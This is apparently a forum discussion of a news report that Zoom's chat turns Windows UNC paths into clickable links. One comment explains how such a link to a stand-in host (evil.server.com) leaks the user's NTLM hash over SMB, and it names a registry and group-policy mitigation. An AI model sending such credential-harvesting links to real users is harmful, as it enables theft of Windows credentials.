
Zoom Lets Attackers Steal Windows Credentials via UNC Links - JDW1023
https://www.bleepingcomputer.com/news/security/zoom-lets-attackers-steal-windows-credentials-via-unc-links/
======
rkagerer
Not to say they shouldn't mitigate it (which should be trivial), but this
seems to me like more of a Windows "bug" than a Zoom one.

Basically attacker sends:

    
    
        \\evil.server.com\img\cat.jpg
    

Zoom client makes it a clickable link. When clicked, SMB sends your username
and NTLM password hash to the remote server (just like it would when
connecting to any other file share).

Can be mitigated with a group policy or registry tweak (Network security:
Restrict NTLM: Outgoing NTLM traffic to remote servers /
RestrictSendingNTLMTraffic) but that can cause side effects (particularly when
joined to a domain).

IMO the out-of-box OS behavior ought to ask you before sending any credentials
to a strange server - like SSH clients do the first time they connect to a new
host. (After all, it's not like you walk down the street advertising your ID
to strangers).

